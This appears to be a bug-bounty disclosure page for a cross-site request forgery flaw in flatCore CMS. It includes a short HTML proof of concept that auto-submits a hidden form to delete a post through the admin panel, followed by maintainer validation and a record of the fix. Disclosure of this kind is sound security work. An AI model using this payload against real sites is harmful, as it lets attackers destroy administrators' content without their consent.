Cross-Site Request Forgery (CSRF) in flatcore/flatcore-cms

Valid

Reported on

Oct 11th 2021


Description

  1. Missing CSRF token in delete posts and delete folder in the frontend
  2. Missing backend CSRF validation in 1) removing and enabling fix status and 2) deleting posts, and 3) delete folder and 4) del_exclude in the indexing page (see Permalinks)
  3. Delete cache

Proof of Concept

Open in index.html
<html>
  <body>
        <form action="http://[FLATCORE-IP]/flatCore-CMS/acp/acp.php?tn=posts" method="POST">
        <input type="hidden" name="delete_id" value="2" />
        </form>
        <script>
        document.forms[0].submit();
        </script>
  </body>
</html>

Impact

Attackers can trick admin users into deleting posts and changing fix status.

Occurences

delete cache backend

missing delete post validation backend

delete_cache frontend

missing delete folder frontend

missing delete folder backend

missing delete element frontend

removed fixed backend

set fixed backend

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
haxatron
2 months ago

Researcher


Hi @admin, maintainer says he will take time to post the SECURITY.md, https://github.com/flatCore/flatCore-CMS/issues/70, if possible, could you help me by posting the report links there? Thanks!

haxatron modified their report
2 months ago
haxatron modified their report
2 months ago
Jamie Slome
2 months ago

Admin


@haxatron - feel free to share the report URLs on the Github issue that has been created. You are always welcome to share these reports, as the maintainers that view them will be authorised to view.

If the maintainers prefer not to sign up, we request the SECURITY.md so that we can send a magic URL, giving them access, to their elected email address.

Patrick validated this vulnerability 2 months ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Patrick confirmed that a fix has been merged on 1d0259 2 months ago
Patrick has been awarded the fix bounty
dashboard.top.php#L6L15 has been validated
dashboard.top.php#L290 has been validated
posts.list.php#L50L59 has been validated
files.browser.php#L191L210 has been validated
files.browser.php#L609L617 has been validated
pages.index.php#L428L438 has been validated
posts.list.php#L11L31 has been validated
posts.list.php#L38L46 has been validated